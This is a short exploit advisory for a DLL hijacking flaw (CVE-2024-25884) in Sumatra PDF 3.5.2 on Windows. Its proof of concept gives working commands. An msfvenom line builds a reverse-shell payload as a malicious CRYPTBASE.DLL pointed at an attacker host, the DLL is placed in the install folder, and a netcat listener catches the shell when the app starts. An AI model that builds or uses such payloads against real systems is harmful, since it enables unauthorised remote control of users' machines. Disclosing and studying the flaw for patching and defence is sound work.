SumatraPDF 3.5.2 DLL Hijack  
# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack  
# Date: 03.03.2024  
# Exploit Author: Krishna Vamshi Katta Rokkaiah  
# Vendor Homepage:  
# Software Link:  
# Version: 3.5.2  
# Tested on: Windows 11  
# CVE : CVE-2024-25884  
In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.  
Proof of Concept:  
1. Use MSFVenom to create a malicious DLL:  
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL  
2. Copy this file to the Sumatra PDF installation folder:  
3. Start a listener in attacking system:  
nc -nlvp 7777  
4. Start the Sumatra PDF application and notice a reverse shell in the attacking system.